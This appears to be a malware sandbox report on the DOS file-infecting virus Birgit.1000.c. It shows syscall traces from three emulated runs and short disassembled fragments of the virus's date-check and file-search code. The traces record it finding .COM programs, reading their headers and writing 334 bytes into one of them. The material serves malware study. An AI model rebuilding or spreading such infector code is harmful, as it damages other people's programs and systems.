Sample viewer

vx.netlux.org/Virus.DOS.Birgit.1000.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:03:54.370058917Z 250 PC: 12c0e | UNKNOWN!
2018-12-17T22:03:54.371421494Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
0x12c00: jne 0x12c0f
0x12c02: int 5
0x12c04: push 0xfa02
0x12c07: pop ax
0x12c08: push 0x5945
0x12c0b: pop dx
0x12c0c: int 0x21
0x12c0e: ret
0x12c0f: cld
0x12c10: mov cx, 4
0x12c13: mov di, 0x100
0x12c16: lea si, word ptr [bp + 0x360]
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12c1c: mov ah, 0x47
0x12c1e: mov dl, 0
0x12c20: lea si, word ptr [bp + 0x3ea]
0x12c24: int 0x21
0x12c26: mov ah, 0x4e
0x12c28: lea dx, word ptr [bp + 0x3e0]
2018-12-17T22:03:54.373960145Z 71 PC: 12c26 | Get current directory
2018-12-17T22:03:54.376636369Z 78 PC: 12c31 | Find first file
2018-12-17T22:03:54.382872582Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.385494611Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.388013956Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.391182118Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.393890881Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.396393352Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.399309708Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.402514184Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.404835373Z 79 PC: 12ca0 | Find next file
2018-12-17T22:03:54.406261897Z 59 PC: 12c8c | Change current directory
2018-12-17T22:03:54.409284336Z 59 PC: 12cc6 | Change current directory
2018-12-17T22:03:54.413699442Z 250 PC: 12c0e | UNKNOWN!
2018-12-17T22:03:54.415301626Z 44 PC: 12ac1 | Get time 0x12ac1: cmp word ptr [si + 0x11b], 0
0x12ac6: je 0x12ad4
0x12ac8: cmp word ptr [si + 0x11c], 0
0x12acd: je 0x12ad4
0x12acf: cmp dh, 0xf
0x12ad2: jle 0x12ae2
0x12ad4: cmp dl, 0
0x12ad7: je 0x12abd
0x12ad9: cmp dh, 0
0x12adc: je 0x12abd
0x12ade: mov word ptr [si + 0x11b], dx
0x12ae2: mov bp, word ptr [si + 0x245]
0x12ae6: add bp, 0x103
0x12aea: lea dx, word ptr [si + 0x247]
0x12aee: sub cx, cx
0x12af0: mov ah, 0x4e
0x12af2: int 0x21
0x12af4: jb 0x12b72
0x12af6: mov dx, 0x9e
0x12af9: mov ax, 0x3d02
2018-12-17T22:03:54.418212502Z 78 PC: 12af4 | Find first file
2018-12-17T22:03:54.429620809Z 61 PC: 12afe | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:03:54.435931989Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:03:54.443751282Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.44646857Z 61 PC: 12afe | Open file (Filename = 'PRINT.COM')
2018-12-17T22:03:54.452769802Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:03:54.460110888Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.46276428Z 61 PC: 12afe | Open file (Filename = 'HELLO.COM')
2018-12-17T22:03:54.469158695Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:03:54.4760437Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.478593088Z 61 PC: 12afe | Open file (Filename = 'PHANG.COM')
2018-12-17T22:03:54.485182502Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:03:54.491478565Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.503385669Z 61 PC: 12afe | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:03:54.509688112Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:03:54.515735416Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.518804243Z 61 PC: 12afe | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:03:54.525039267Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:03:54.531185297Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.534207089Z 61 PC: 12afe | Open file (Filename = 'PAH.COM')
2018-12-17T22:03:54.54042648Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:03:54.546538547Z 79 PC: 12af4 | Find next file
2018-12-17T22:03:54.549632125Z 61 PC: 12afe | Open file (Filename = 'TEST.COM')
2018-12-17T22:03:54.556085377Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:03:54.562076979Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.564475468Z 63 PC: 12b7b | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:03:54.566973257Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.568538399Z 64 PC: 12ab9 | Write file or device (Write 334 bytes on handle 12)
2018-12-17T22:03:54.583652974Z 66 PC: 12b7b | Move file pointer
2018-12-17T22:03:54.584924512Z 64 PC: 12b7b | Write file or device (Write 2 bytes on handle 12)
2018-12-17T22:03:54.587674794Z 62 PC: 12b7b | Close file
2018-12-17T22:03:54.595938688Z 76 PC: 12a57 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1556,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:55.073508774Z 250 PC: 12c0e | UNKNOWN!
2018-12-25T11:43:55.075260512Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
0x12c00: jne 0x12c0f
0x12c02: int 5
0x12c04: push 0xfa02
0x12c07: pop ax
0x12c08: push 0x5945
0x12c0b: pop dx
0x12c0c: int 0x21
0x12c0e: ret
0x12c0f: cld
0x12c10: mov cx, 4
0x12c13: mov di, 0x100
0x12c16: lea si, word ptr [bp + 0x360]
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12c1c: mov ah, 0x47
0x12c1e: mov dl, 0
0x12c20: lea si, word ptr [bp + 0x3ea]
0x12c24: int 0x21
0x12c26: mov ah, 0x4e
0x12c28: lea dx, word ptr [bp + 0x3e0]
2018-12-25T11:43:55.077221831Z 71 PC: 12c26 | Get current directory
2018-12-25T11:43:55.079695823Z 78 PC: 12c31 | Find first file
2018-12-25T11:43:55.08529988Z 79 PC: 12ca0 | Find next file
2018-12-25T11:43:55.088236973Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.091567219Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.094823805Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.106811446Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.109784521Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.112776249Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.116235963Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.11868092Z 79 PC: 12ca0 | Find next file (See above)
2018-12-25T11:43:55.120934715Z 59 PC: 12c8c | Change current directory
2018-12-25T11:43:55.130753015Z 59 PC: 12cc6 | Change current directory
2018-12-25T11:43:55.134831231Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.136297638Z 44 PC: 12ac1 | Get time 0x12ac1: cmp word ptr [si + 0x11b], 0
0x12ac6: je 0x12ad4
0x12ac8: cmp word ptr [si + 0x11c], 0
0x12acd: je 0x12ad4
0x12acf: cmp dh, 0xf
0x12ad2: jle 0x12ae2
0x12ad4: cmp dl, 0
0x12ad7: je 0x12abd
0x12ad9: cmp dh, 0
0x12adc: je 0x12abd
0x12ade: mov word ptr [si + 0x11b], dx
0x12ae2: mov bp, word ptr [si + 0x245]
0x12ae6: add bp, 0x103
0x12aea: lea dx, word ptr [si + 0x247]
0x12aee: sub cx, cx
0x12af0: mov ah, 0x4e
0x12af2: int 0x21
0x12af4: jb 0x12b72
0x12af6: mov dx, 0x9e
0x12af9: mov ax, 0x3d02
2018-12-25T11:43:55.139084595Z 78 PC: 12af4 | Find first file
2018-12-25T11:43:55.147870087Z 61 PC: 12afe | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:55.154270362Z 63 PC: 12b7b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:43:55.161044366Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.16417589Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.170536686Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.176903673Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.180076377Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.196791932Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.203153541Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.207015543Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.213697012Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.219923448Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.223140959Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.229515414Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.235866536Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.239285231Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.245560392Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.252079686Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.255181521Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.261393892Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.267456226Z 79 PC: 12af4 | Find next file (See above)
2018-12-25T11:43:55.270164234Z 61 PC: 12afe | Open file (See above)
2018-12-25T11:43:55.27685726Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.282860378Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.284132582Z 63 PC: 12b7b | Read file or device (See above)
2018-12-25T11:43:55.286920141Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.288169311Z 64 PC: 12ab9 | Write file or device (Write 334 bytes on handle 12)
2018-12-25T11:43:55.301090876Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T11:43:55.3029025Z 64 PC: 12b7b | Write file or device (See above)
2018-12-25T11:43:55.305618832Z 62 PC: 12b7b | Close file (See above)
2018-12-25T11:43:55.313589323Z 76 PC: 12a57 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1556,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:43:55.395105429Z 250 PC: 12c0e | UNKNOWN!
2018-12-25T11:43:55.396461022Z 42 PC: 12bfd | Get date 0x12bfd: cmp dh, 3
0x12c00: jne 0x12c0f
0x12c02: int 5
0x12c04: push 0xfa02
0x12c07: pop ax
0x12c08: push 0x5945
0x12c0b: pop dx
0x12c0c: int 0x21
0x12c0e: ret
0x12c0f: cld
0x12c10: mov cx, 4
0x12c13: mov di, 0x100
0x12c16: lea si, word ptr [bp + 0x360]
0x12c1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12c1c: mov ah, 0x47
0x12c1e: mov dl, 0
0x12c20: lea si, word ptr [bp + 0x3ea]
0x12c24: int 0x21
0x12c26: mov ah, 0x4e
0x12c28: lea dx, word ptr [bp + 0x3e0]
2018-12-25T11:43:55.399267446Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.400103796Z 250 PC: 12c0e | UNKNOWN! (See above)
2018-12-25T11:43:55.401447539Z 42 PC: 12bfd | Get date (See above)
2018-12-25T11:43:55.404439736Z 250 PC: 12c0e | UNKNOWN! (See above)